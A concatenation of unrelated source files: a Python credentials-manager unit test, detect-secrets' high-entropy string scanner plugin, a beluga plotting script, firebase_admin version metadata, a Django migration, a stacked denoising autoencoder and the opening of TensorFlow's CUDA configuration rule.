        test case to test if credentials is saved into the credentials list
        '''
        self.new_credentials.save_credentials() # saving new credentials
        self.assertEqual(len(Credentials.credentials_list), 1)

    def tearDown(self):
        '''
        tear down method does clean up after each test case has been run
        '''
        Credentials.credentials_list =[]

    def test_save_multiple_credentials(self):
        '''
        test to check if we can save multiple credentials
        '''
        self.new_credentials.save_credentials()
        test_credentials = Credentials("Twitter","papa","guks001")
        test_credentials.save_credentials()
        self.assertEqual(len(Credentials.credentials_list), 2)

    def test_del_credentials(self):
        '''
        test to see if we can remove a credential from our credentials list
        '''
        self.new_credentials.save_credentials()
        test_credentials = Credentials("Twitter","papa","guks001")
        test_credentials.save_credentials()

        self.new_credentials.del_credentials() # deleting credentials object
        self.assertEqual(len(Credentials.credentials_list), 1)

    def test_find_credentials_by_username(self):
        '''
        test to see if we can find credentials by username and display information
        '''
        self.new_credentials.save_credentials()
        test_credentials = Credentials("Twitter","papa","guks001") # new credential
        test_credentials.save_credentials()

        found_credentials = Credentials.find_by_username("papa")
        self.assertEqual(found_credentials.password, test_credentials.password)

    def test_display_all_credentials(self):
        '''
        method that returns a list of all credentials saved
        '''
        self.assertEqual(Credentials.display_credentials(),Credentials.credentials_list)

    def test_exists_credentials(self):
        '''
        test to check if we can return a Boolean if we cannot find the credentials.
        '''
        # Fixed: previously called self.new_credential.save_credential(),
        # which raised AttributeError (setUp defines self.new_credentials
        # and the method is save_credentials).
        self.new_credentials.save_credentials()
        test_credentials = Credentials("Twitter","papa", "guks001") # new contact
        test_credentials.save_credentials()

        credentials_exists = Credentials.credentials_exist("papa")
        self.assertTrue(credentials_exists)
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 35.940476
| 89
| 0.675389
|
4a0f42cbbd28b92347e0d415783d14bf591cab42
| 15,172
|
py
|
Python
|
detect_secrets/plugins/high_entropy_strings.py
|
digjanaik/detect-secrets
|
624024ad5fd8a608e09ed719e5edab6ca95ef47e
|
[
"Apache-2.0"
] | null | null | null |
detect_secrets/plugins/high_entropy_strings.py
|
digjanaik/detect-secrets
|
624024ad5fd8a608e09ed719e5edab6ca95ef47e
|
[
"Apache-2.0"
] | 1
|
2020-08-12T21:57:16.000Z
|
2020-08-12T21:57:16.000Z
|
detect_secrets/plugins/high_entropy_strings.py
|
digjanaik/detect-secrets
|
624024ad5fd8a608e09ed719e5edab6ca95ef47e
|
[
"Apache-2.0"
] | null | null | null |
import base64
import configparser
import math
import re
import string
from abc import ABCMeta
from abc import abstractmethod
from contextlib import contextmanager
import yaml
from detect_secrets.core.potential_secret import PotentialSecret
from detect_secrets.plugins.base import BasePlugin
from detect_secrets.plugins.base import classproperty
from detect_secrets.plugins.common.filetype import determine_file_type
from detect_secrets.plugins.common.filetype import FileType
from detect_secrets.plugins.common.filters import get_aho_corasick_helper
from detect_secrets.plugins.common.filters import is_false_positive_with_line_context
from detect_secrets.plugins.common.filters import is_potential_uuid
from detect_secrets.plugins.common.filters import is_sequential_string
from detect_secrets.plugins.common.ini_file_parser import IniFileParser
from detect_secrets.plugins.common.yaml_file_parser import YamlFileParser
class HighEntropyStringsPlugin(BasePlugin):
    """Base class for string pattern matching"""

    __metaclass__ = ABCMeta

    def __init__(self, charset, limit, exclude_lines_regex, automaton, *args):
        # `limit` is a Shannon-entropy threshold; 8.0 is the theoretical
        # maximum for an 8-bit alphabet.
        if limit < 0 or limit > 8:
            raise ValueError(
                'The limit set for HighEntropyStrings must be between 0.0 and 8.0',
            )

        self.charset = charset
        self.entropy_limit = limit
        # Matches quoted strings composed entirely of charset characters;
        # group 2 is the candidate secret.
        self.regex = re.compile(r'([\'"])([%s]+)(\1)' % charset)

        false_positive_heuristics = [
            get_aho_corasick_helper(automaton),
            is_sequential_string,
            is_potential_uuid,
        ]

        super(HighEntropyStringsPlugin, self).__init__(
            exclude_lines_regex=exclude_lines_regex,
            false_positive_heuristics=false_positive_heuristics,
        )

    def analyze(self, file, filename):
        """Try each file-type-specific analyzer in turn, returning the first
        non-empty result. The file is rewound between attempts."""
        file_type_analyzers = (
            (self._analyze_ini_file(), configparser.Error),
            (self._analyze_yaml_file, yaml.YAMLError),
            (super(HighEntropyStringsPlugin, self).analyze, Exception),
            (self._analyze_ini_file(add_header=True), configparser.Error),
        )

        for analyze_function, exception_class in file_type_analyzers:
            try:
                output = analyze_function(file, filename)
                if output:
                    return output
            except exception_class:
                pass

            file.seek(0)

        return {}

    def calculate_shannon_entropy(self, data):
        """Returns the entropy of a given string.

        Borrowed from: http://blog.dkbza.org/2007/05/scanning-data-for-entropy-anomalies.html.

        :param data: string. The word to analyze.
        :returns: float, between 0.0 and 8.0
        """
        if not data:  # pragma: no cover
            return 0

        entropy = 0
        for x in self.charset:
            p_x = float(data.count(x)) / len(data)
            if p_x > 0:
                entropy += - p_x * math.log(p_x, 2)

        return entropy

    @staticmethod
    def _filter_false_positives_with_line_ctx(potential_secrets, line):
        # Drop secrets that look like false positives when judged with the
        # full line as context (e.g. variable names, templated values).
        return {
            key: value for key, value in potential_secrets.items()
            if not is_false_positive_with_line_context(
                key.secret_value,
                line,
            )
        }

    def analyze_line(self, string, line_num, filename):
        """Scan a single line, then apply line-context false-positive filters."""
        output = super(HighEntropyStringsPlugin, self).analyze_line(
            string,
            line_num,
            filename,
        )
        return self._filter_false_positives_with_line_ctx(
            output,
            string,
        )

    def analyze_string_content(self, string, line_num, filename):
        """Searches string for custom pattern, and captures all high entropy strings that
        match self.regex, with a limit defined as self.entropy_limit.
        """
        output = {}

        for result in self.secret_generator(string):
            if self.is_secret_false_positive(result):
                continue
            secret = PotentialSecret(self.secret_type, filename, result, line_num)
            output[secret] = secret

        return output

    def secret_generator(self, string, *args, **kwargs):
        """Yield each regex match whose entropy exceeds self.entropy_limit."""
        # There may be multiple strings on the same line
        results = self.regex.findall(string)
        for result in results:
            # To accommodate changing self.regex, due to different filetypes
            if isinstance(result, tuple):
                result = result[1]

            entropy_value = self.calculate_shannon_entropy(result)
            if entropy_value > self.entropy_limit:
                yield result

    def adhoc_scan(self, string):
        """Scan a single user-supplied string (no quotes required) and return
        'True '/'False', optionally annotated with the entropy value."""
        # Since it's an individual string, it's just bad UX to require quotes
        # around the expected secret.
        with self.non_quoted_string_regex(is_exact_match=False):
            results = self.analyze_line(
                string,
                line_num=0,
                filename='does_not_matter',
            )

        # Note: Trailing space allows for nicer formatting
        output = 'False' if not results else 'True '

        if results:
            # We currently assume that there's at most one secret per line.
            output += ' ({})'.format(
                round(
                    self.calculate_shannon_entropy(
                        list(results.keys())[0].secret_value,
                    ),
                    3,
                ),
            )
        elif ' ' not in string:
            # In the case where the string is a single word, and it
            # matches the regex, we can show the entropy calculation,
            # to assist investigation when it's unclear *why* something
            # is not flagged.
            #
            # Conversely, if there are multiple words in the string,
            # the entropy value would be confusing, since it's not clear
            # which word the entropy is calculated for.
            matches = self.regex.search(string)
            if matches and matches.group(1) == string:
                output += ' ({})'.format(
                    round(self.calculate_shannon_entropy(string), 3),
                )

        return output

    @contextmanager
    def non_quoted_string_regex(self, is_exact_match=True):
        """For certain file formats, strings need not necessarily follow the
        normal convention of being denoted by single or double quotes. In these
        cases, we modify the regex accordingly.

        Public, because detect_secrets.core.audit needs to reference it.

        :param is_exact_match: True if you need to scan the string itself.
            However, if the string is a line of text, and you want to see
            whether a secret exists in this line, use False.
        """
        old_regex = self.regex

        regex_alternative = r'([{}]+)'.format(re.escape(self.charset))
        if is_exact_match:
            regex_alternative = r'^' + regex_alternative + r'$'

        self.regex = re.compile(regex_alternative)

        try:
            yield
        finally:
            # Always restore the original regex, even if the caller raised.
            self.regex = old_regex

    def _analyze_ini_file(self, add_header=False):
        """
        :returns: same format as super().analyze()
        """
        def wrapped(file, filename):
            output = {}

            with self.non_quoted_string_regex():
                for key, value, lineno in IniFileParser(
                    file,
                    add_header,
                    exclude_lines_regex=self.exclude_lines_regex,
                ).iterator():
                    potential_secrets = self.analyze_string_content(
                        value,
                        lineno,
                        filename,
                    )

                    # Reconstruct the assignment so the line-context filter
                    # sees the key as well as the value.
                    line = u'{key}={value}'.format(key=key, value=value)
                    potential_secrets = self._filter_false_positives_with_line_ctx(
                        potential_secrets,
                        line,
                    )

                    output.update(potential_secrets)

            return output

        return wrapped

    def _analyze_yaml_file(self, file, filename):
        """
        :returns: same format as super().analyze()
        """
        if determine_file_type(filename) != FileType.YAML:
            # The yaml parser is pretty powerful. It eagerly
            # parses things when it's not even a yaml file. Therefore,
            # we use this heuristic to quit early if appropriate.
            raise yaml.YAMLError

        parser = YamlFileParser(
            file,
            exclude_lines_regex=self.exclude_lines_regex,
        )
        data = parser.json()

        # If the file is all comments
        if not data:
            raise yaml.YAMLError

        ignored_lines = parser.get_ignored_lines()

        potential_secrets = {}
        # Depth-first walk over the parsed tree; leaf dicts carry the parser's
        # bookkeeping keys (__line__, __value__, ...).
        to_search = [data]
        with self.non_quoted_string_regex():
            while len(to_search) > 0:
                item = to_search.pop()

                if '__line__' not in item:
                    for key in item:
                        obj = item[key] if isinstance(item, dict) else key
                        if isinstance(obj, dict):
                            to_search.append(obj)
                    continue

                if item['__line__'] in ignored_lines:
                    continue

                # An isinstance check doesn't work in py2
                # so we need the __is_binary__ field.
                string_to_scan = (
                    self.decode_binary(item['__value__'])
                    if item['__is_binary__']
                    else item['__value__']
                )
                secrets = self.analyze_string_content(
                    string_to_scan,
                    item['__line__'],
                    filename,
                )
                if item['__is_binary__']:
                    secrets = self._encode_yaml_binary_secrets(secrets)

                dumped_key_value = yaml.dump({
                    item['__original_key__']: item['__value__'],
                }).replace('\n', '')
                secrets = self._filter_false_positives_with_line_ctx(
                    secrets,
                    dumped_key_value,
                )

                potential_secrets.update(secrets)

        return potential_secrets

    def _encode_yaml_binary_secrets(self, secrets):
        new_secrets = {}
        # NOTE(review): the string below is a no-op statement, not a
        # docstring (it follows an assignment); consider moving it above.
        """The secrets dict format is
        `{PotentialSecret: PotentialSecret}`, where both key and
        value are the same object. Therefore, we can just mutate
        the potential secret once.
        """
        for potential_secret in secrets.keys():
            secret_in_yaml_format = yaml.dump(
                self.encode_to_binary(potential_secret.secret_value),
            ).replace(
                '!!binary |\n  ',
                '',
            ).rstrip()

            potential_secret.set_secret(secret_in_yaml_format)
            new_secrets[potential_secret] = potential_secret

        return new_secrets

    @abstractmethod
    def decode_binary(self, bytes_object):  # pragma: no cover
        """Converts the bytes to a string which can be checked for
        high entropy."""
        pass

    @abstractmethod
    def encode_to_binary(self, string):  # pragma: no cover
        """Converts a string (usually a high-entropy secret) to
        binary. Usually the inverse of decode_binary."""
        pass
class HexHighEntropyString(HighEntropyStringsPlugin):
    """Scans for random-looking hex encoded strings."""

    secret_type = 'Hex High Entropy String'

    def __init__(self, hex_limit, exclude_lines_regex=None, automaton=None, **kwargs):
        super().__init__(
            charset=string.hexdigits,
            limit=hex_limit,
            exclude_lines_regex=exclude_lines_regex,
            automaton=automaton,
        )

    @classproperty
    def disable_flag_text(cls):
        return 'no-hex-string-scan'

    @classproperty
    def default_options(cls):
        return {
            'hex_limit': 3,
        }

    @property
    def __dict__(self):
        # Deliberately starts the MRO walk above HighEntropyStringsPlugin,
        # then adds this plugin's own limit to the serialized form.
        output = super(HighEntropyStringsPlugin, self).__dict__
        output.update({
            'hex_limit': self.entropy_limit,
        })

        return output

    def calculate_shannon_entropy(self, data):
        """Entropy of *data*, discounted when the string is purely numeric.

        All-digit strings produce far more false positives than realistic
        true positives, so their entropy is reduced below the usual limit;
        longer digit runs (more likely genuine) are discounted less.
        """
        entropy = super().calculate_shannon_entropy(data)
        if len(data) == 1:
            return entropy

        try:
            # Only discount strings that parse as an integer.
            int(data)
        except ValueError:
            return entropy

        # This multiplier was determined through trial and error, with the
        # intent of keeping it simple, yet achieving our goals.
        entropy -= 1.2 / math.log(len(data), 2)
        return entropy

    def decode_binary(self, bytes_object):
        return bytes_object.decode('utf-8')

    def encode_to_binary(self, string):
        return string.encode('utf-8')
class Base64HighEntropyString(HighEntropyStringsPlugin):
    """Scans for random-looking base64 encoded strings."""

    secret_type = 'Base64 High Entropy String'

    def __init__(self, base64_limit, exclude_lines_regex=None, automaton=None, **kwargs):
        # Regular and url-safe base64 alphabets, plus '=' padding.
        base64_charset = ''.join((
            string.ascii_letters,
            string.digits,
            '+/',
            '\\-_',
            '=',
        ))
        super().__init__(
            charset=base64_charset,
            limit=base64_limit,
            exclude_lines_regex=exclude_lines_regex,
            automaton=automaton,
        )

    @classproperty
    def disable_flag_text(cls):
        return 'no-base64-string-scan'

    @classproperty
    def default_options(cls):
        return {
            'base64_limit': 4.5,
        }

    @property
    def __dict__(self):
        # Deliberately starts the MRO walk above HighEntropyStringsPlugin,
        # then adds this plugin's own limit to the serialized form.
        output = super(HighEntropyStringsPlugin, self).__dict__
        output.update({
            'base64_limit': self.entropy_limit,
        })

        return output

    def decode_binary(self, bytes_object):
        """Base64-encode raw bytes into an ASCII string for entropy checks."""
        return base64.b64encode(bytes_object).decode('utf-8')

    def encode_to_binary(self, string):
        """Inverse of decode_binary."""
        return base64.b64decode(string)
| 33.941834
| 94
| 0.588782
|
4a0f438a1cc0c8534fedc3bef50bd2c00a4a439f
| 1,809
|
py
|
Python
|
examples/qcpi/heatRate/compare_plot.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-03-26T03:00:03.000Z
|
2019-03-26T03:00:03.000Z
|
examples/qcpi/heatRate/compare_plot.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | null | null | null |
examples/qcpi/heatRate/compare_plot.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-07-14T22:53:52.000Z
|
2019-07-14T22:53:52.000Z
|
from beluga.visualization import BelugaPlot
from beluga.visualization.datasources import Dill

# plots = BelugaPlot('./data.dill',default_sol=-1,default_step=0)

# Reference MPBVP solution used for comparison against the ICRM run.
mpbvp_ds = Dill('../../mpbvp/planarHypersonicWithHeatRate/data_1200.dill')

plots = BelugaPlot('./data_1200_2deg15km_ep4.dill',default_sol=-1,default_step=-1, renderer='matplotlib')

# Fixed: the first plot chain previously ended with a stray trailing
# backslash after the final .line(...) call, which spliced the statement
# into whatever followed it.
plots.add_plot().line('theta*180/3.14','h/1000',label='ICRM Solution') \
                .xlabel('Downrange (deg)').ylabel('h (km)') \
                .title('Altitude vs. Downrange') \
                .line('theta*180/3.14','h/1000',label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1)

plots.add_plot().line('t','k*sqrt(rho0*exp(-h/H)/rn)*v**3/10000',label='ICRM Solution') \
                .line('t','k*sqrt(rho0*exp(-h/H)/rn)*v**3/10000',label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1) \
                .xlabel('t (s)').ylabel('Heat-rate') \
                .title('Heat-rate vs. Time')

# plots.add_plot().line('t','theta*180/3.14',label='ICRM Solution') \
#                 .line('t','theta*180/3.14',label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1)\
#                 .line('t','theta*180/3.14',label='Unconstrained Solution', datasource=mpbvp_ds, step=0, sol=-1)\
#                 .xlabel('t (s)').ylabel('theta (degrees)') \
#                 .title('Control history')
#
# plots.add_plot().line('t','lamY', label='ICRM Solution') \
#                 .line('t','lamY', label='MPBVP Solution', datasource=mpbvp_ds, step=-1, sol=-1)\
#                 .line('t','lamY', label='Unconstrained Solution', datasource=mpbvp_ds, step=0, sol=-1) \
#                 .xlabel('t (s)').ylabel('lamY') \
#                 .title('lamY')

plots.render()
| 58.354839
| 128
| 0.566611
|
4a0f44623979aa4cda917fef5a11a2ca457bad0c
| 809
|
py
|
Python
|
firebase_admin/__about__.py
|
kushal12345/firebase-admin-python
|
14e5dc4721f9908e132f137c87bf0dc6b8709f63
|
[
"Apache-2.0"
] | 4
|
2019-02-17T17:52:55.000Z
|
2020-05-06T06:45:56.000Z
|
firebase_admin/__about__.py
|
kushal12345/firebase-admin-python
|
14e5dc4721f9908e132f137c87bf0dc6b8709f63
|
[
"Apache-2.0"
] | null | null | null |
firebase_admin/__about__.py
|
kushal12345/firebase-admin-python
|
14e5dc4721f9908e132f137c87bf0dc6b8709f63
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""About information (version, etc) for Firebase Admin SDK."""
__version__ = '2.11.0'
__title__ = 'firebase_admin'
__author__ = 'Firebase'
__license__ = 'Apache License 2.0'
__url__ = 'https://firebase.google.com/docs/admin/setup/'
| 36.772727
| 74
| 0.751545
|
4a0f44a288ce93138794c349bb1c8681911e53d9
| 326
|
py
|
Python
|
apps/accounts/migrations/0005_merge.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 25
|
2017-12-10T00:48:31.000Z
|
2022-03-25T01:29:13.000Z
|
apps/accounts/migrations/0005_merge.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 298
|
2017-12-05T05:53:32.000Z
|
2022-03-21T19:29:03.000Z
|
apps/accounts/migrations/0005_merge.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 31
|
2017-12-04T16:01:12.000Z
|
2021-09-26T22:34:55.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-26 20:31
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Merge migration: unifies the two parallel 'accounts' migration branches
    # ('0004_merge' and '0004_auto_20160720_1816').  It intentionally performs
    # no schema operations.
    dependencies = [
        ('accounts', '0004_merge'),
        ('accounts', '0004_auto_20160720_1816'),
    ]
    operations = [
    ]
| 19.176471
| 48
| 0.650307
|
4a0f45a3cb2b9692ae1b99252dc8591edc461d17
| 5,877
|
py
|
Python
|
SdA.py
|
yanshengli/DBN_Learning
|
a9d2dc337b079cccdc172d1957a14a20c146b9b3
|
[
"Apache-2.0"
] | 15
|
2015-07-30T12:45:38.000Z
|
2022-03-24T06:01:29.000Z
|
example/DeepLearning/python/SdA.py
|
yulongfan/tryEverything
|
2f66a8d33c3539e46d91527186bc52515ce5b14f
|
[
"Apache-2.0"
] | null | null | null |
example/DeepLearning/python/SdA.py
|
yulongfan/tryEverything
|
2f66a8d33c3539e46d91527186bc52515ce5b14f
|
[
"Apache-2.0"
] | 11
|
2016-08-01T02:30:33.000Z
|
2020-11-24T08:43:40.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Stacked Denoising Autoencoders (SdA)
References :
- P. Vincent, H. Larochelle, Y. Bengio, P.A. Manzagol: Extracting and
Composing Robust Features with Denoising Autoencoders, ICML' 08, 1096-1103,
2008
- DeepLearningTutorials
https://github.com/lisa-lab/DeepLearningTutorials
"""
import sys
import numpy
from HiddenLayer import HiddenLayer
from LogisticRegression import LogisticRegression
from dA import dA
from utils import *
class SdA(object):
    """Stacked denoising autoencoder (Python 2 code: uses xrange).

    Builds n_layers pairs of (HiddenLayer, dA) that share weights W and
    hidden bias b, topped by a LogisticRegression output layer.  Training is
    the classic two-phase scheme: greedy layer-wise pretraining of each dA,
    then supervised finetuning of the logistic layer only.
    """
    def __init__(self, input=None, label=None,\
                 n_ins=2, hidden_layer_sizes=[3, 3], n_outs=2,\
                 numpy_rng=None):
        # NOTE(review): hidden_layer_sizes uses a mutable default list; it is
        # only read (len/indexing) here, so sharing across calls is benign.
        self.x = input
        self.y = label
        self.sigmoid_layers = []
        self.dA_layers = []
        self.n_layers = len(hidden_layer_sizes)  # one dA per hidden layer
        if numpy_rng is None:
            numpy_rng = numpy.random.RandomState(1234)
        assert self.n_layers > 0
        # construct multi-layer
        for i in xrange(self.n_layers):
            # layer_size: first layer consumes the raw input width
            if i == 0:
                input_size = n_ins
            else:
                input_size = hidden_layer_sizes[i - 1]
            # layer_input: sampled hidden activations of the previous layer
            if i == 0:
                layer_input = self.x
            else:
                layer_input = self.sigmoid_layers[-1].sample_h_given_v()
            # construct sigmoid_layer
            sigmoid_layer = HiddenLayer(input=layer_input,
                                        n_in=input_size,
                                        n_out=hidden_layer_sizes[i],
                                        numpy_rng=numpy_rng,
                                        activation=sigmoid)
            self.sigmoid_layers.append(sigmoid_layer)
            # construct dA_layers sharing W and hbias with the sigmoid layer,
            # so pretraining the dA updates the feed-forward weights too
            dA_layer = dA(input=layer_input,
                          n_visible=input_size,
                          n_hidden=hidden_layer_sizes[i],
                          W=sigmoid_layer.W,
                          hbias=sigmoid_layer.b)
            self.dA_layers.append(dA_layer)
        # layer for output using Logistic Regression
        self.log_layer = LogisticRegression(input=self.sigmoid_layers[-1].sample_h_given_v(),
                                            label=self.y,
                                            n_in=hidden_layer_sizes[-1],
                                            n_out=n_outs)
        # finetune cost: the negative log likelihood of the logistic regression layer
        self.finetune_cost = self.log_layer.negative_log_likelihood()
    def pretrain(self, lr=0.1, corruption_level=0.3, epochs=100):
        """Greedy layer-wise denoising-autoencoder pretraining."""
        for i in xrange(self.n_layers):
            # Feed each layer the (sampled) output of the layer below.
            if i == 0:
                layer_input = self.x
            else:
                layer_input = self.sigmoid_layers[i-1].sample_h_given_v(layer_input)
            da = self.dA_layers[i]
            for epoch in xrange(epochs):
                da.train(lr=lr, corruption_level=corruption_level, input=layer_input)
    def finetune(self, lr=0.1, epochs=100):
        """Train only the logistic output layer, decaying lr by 0.95/epoch."""
        layer_input = self.sigmoid_layers[-1].sample_h_given_v()
        # train log_layer
        epoch = 0
        while epoch < epochs:
            self.log_layer.train(lr=lr, input=layer_input)
            # self.finetune_cost = self.log_layer.negative_log_likelihood()
            # print >> sys.stderr, 'Training epoch %d, cost is ' % epoch, self.finetune_cost
            lr *= 0.95
            epoch += 1
    def predict(self, x):
        """Forward-propagate x through all layers; returns class scores."""
        layer_input = x
        for i in xrange(self.n_layers):
            sigmoid_layer = self.sigmoid_layers[i]
            # Deterministic forward pass (mean activations, no sampling).
            layer_input = sigmoid_layer.output(input=layer_input)
        out = self.log_layer.predict(layer_input)
        return out
def test_SdA(pretrain_lr=0.1, pretraining_epochs=1000, corruption_level=0.3, \
finetune_lr=0.1, finetune_epochs=200):
x = numpy.array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0]])
y = numpy.array([[1, 0],
[1, 0],
[1, 0],
[1, 0],
[1, 0],
[0, 1],
[0, 1],
[0, 1],
[0, 1],
[0, 1]])
rng = numpy.random.RandomState(123)
# construct SdA
sda = SdA(input=x, label=y, \
n_ins=20, hidden_layer_sizes=[15, 15], n_outs=2, numpy_rng=rng)
# pre-training
sda.pretrain(lr=pretrain_lr, corruption_level=corruption_level, epochs=pretraining_epochs)
# fine-tuning
sda.finetune(lr=finetune_lr, epochs=finetune_epochs)
# test
x = numpy.array([[1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1]])
print sda.predict(x)
if __name__ == "__main__":
test_SdA()
| 33.392045
| 94
| 0.481538
|
4a0f47108813f77dfad1a1c9f17d98169332c515
| 41,160
|
bzl
|
Python
|
third_party/gpus/cuda_configure.bzl
|
tianhm/tensorflow
|
e55574f28257bdacd744dcdba86c839e661b1b2a
|
[
"Apache-2.0"
] | 47
|
2017-03-08T20:58:54.000Z
|
2021-06-24T07:07:49.000Z
|
third_party/gpus/cuda_configure.bzl
|
genSud/tensorflow
|
ec8216568d8cd9810004067558041c11a8356685
|
[
"Apache-2.0"
] | 1
|
2019-07-11T16:29:54.000Z
|
2019-07-11T16:29:54.000Z
|
third_party/gpus/cuda_configure.bzl
|
genSud/tensorflow
|
ec8216568d8cd9810004067558041c11a8356685
|
[
"Apache-2.0"
] | 19
|
2017-04-17T01:28:40.000Z
|
2020-08-15T13:01:33.000Z
|
# -*- Python -*-
"""Repository rule for CUDA autoconfiguration.
`cuda_configure` depends on the following environment variables:
* `TF_NEED_CUDA`: Whether to enable building with CUDA.
* `GCC_HOST_COMPILER_PATH`: The GCC host compiler path
* `TF_CUDA_CLANG`: Whether to use clang as a cuda compiler.
* `CLANG_CUDA_COMPILER_PATH`: The clang compiler path that will be used for
both host and device code compilation if TF_CUDA_CLANG is 1.
* `CUDA_TOOLKIT_PATH`: The path to the CUDA toolkit. Default is
`/usr/local/cuda`.
* `TF_CUDA_VERSION`: The version of the CUDA toolkit. If this is blank, then
use the system default.
* `TF_CUDNN_VERSION`: The version of the cuDNN library.
* `CUDNN_INSTALL_PATH`: The path to the cuDNN library. Default is
`/usr/local/cuda`.
* `TF_CUDA_COMPUTE_CAPABILITIES`: The CUDA compute capabilities. Default is
`3.5,5.2`.
"""
# Names of the environment variables read by the cuda_configure rule.
_GCC_HOST_COMPILER_PATH = "GCC_HOST_COMPILER_PATH"
_CLANG_CUDA_COMPILER_PATH = "CLANG_CUDA_COMPILER_PATH"
_CUDA_TOOLKIT_PATH = "CUDA_TOOLKIT_PATH"
_TF_CUDA_VERSION = "TF_CUDA_VERSION"
_TF_CUDNN_VERSION = "TF_CUDNN_VERSION"
_CUDNN_INSTALL_PATH = "CUDNN_INSTALL_PATH"
_TF_CUDA_COMPUTE_CAPABILITIES = "TF_CUDA_COMPUTE_CAPABILITIES"
_TF_CUDA_CONFIG_REPO = "TF_CUDA_CONFIG_REPO"
# Defaults used when the corresponding environment variable is unset.
_DEFAULT_CUDA_VERSION = ""
_DEFAULT_CUDNN_VERSION = ""
_DEFAULT_CUDA_TOOLKIT_PATH = "/usr/local/cuda"
_DEFAULT_CUDNN_INSTALL_PATH = "/usr/local/cuda"
_DEFAULT_CUDA_COMPUTE_CAPABILITIES = ["3.5", "5.2"]
# TODO(dzc): Once these functions have been factored out of Bazel's
# cc_configure.bzl, load them from @bazel_tools instead.
# BEGIN cc_configure common functions.
def find_cc(repository_ctx):
  """Find the C++ host compiler.

  Picks clang when cuda_clang mode is enabled, gcc otherwise; the compiler
  name/path can be overridden through the corresponding *_COMPILER_PATH
  environment variable.  Fails if the compiler cannot be located on PATH.
  """
  # On Windows, we use Bazel's MSVC CROSSTOOL for GPU build
  # Return a dummy value for GCC detection here to avoid error
  if _is_windows(repository_ctx):
    return "/use/--config=win-cuda --cpu=x64_windows_msvc/instead"
  if _use_cuda_clang(repository_ctx):
    target_cc_name = "clang"
    cc_path_envvar = _CLANG_CUDA_COMPILER_PATH
  else:
    target_cc_name = "gcc"
    cc_path_envvar = _GCC_HOST_COMPILER_PATH
  cc_name = target_cc_name
  # A non-empty environment override replaces the default compiler name.
  if cc_path_envvar in repository_ctx.os.environ:
    cc_name_from_env = repository_ctx.os.environ[cc_path_envvar].strip()
    if cc_name_from_env:
      cc_name = cc_name_from_env
  if cc_name.startswith("/"):
    # Absolute path, maybe we should make this supported by our which function.
    return cc_name
  cc = repository_ctx.which(cc_name)
  if cc == None:
    fail(("Cannot find {}, either correct your path or set the {}" +
          " environment variable").format(target_cc_name, cc_path_envvar))
  return cc
# Marker line printed by the compiler right before its builtin include list.
_INC_DIR_MARKER_BEGIN = "#include <...>"
# OSX appends " (framework directory)" to framework include lines; strip it.
_OSX_FRAMEWORK_SUFFIX = " (framework directory)"
_OSX_FRAMEWORK_SUFFIX_LEN = len(_OSX_FRAMEWORK_SUFFIX)
def _cxx_inc_convert(path):
  """Normalize one include path printed by `cc -E -xc++ - -v`."""
  cleaned = path.strip()
  if cleaned.endswith(_OSX_FRAMEWORK_SUFFIX):
    cleaned = cleaned[:-_OSX_FRAMEWORK_SUFFIX_LEN].strip()
  return cleaned
def _get_cxx_inc_directories_impl(repository_ctx, cc, lang_is_cpp):
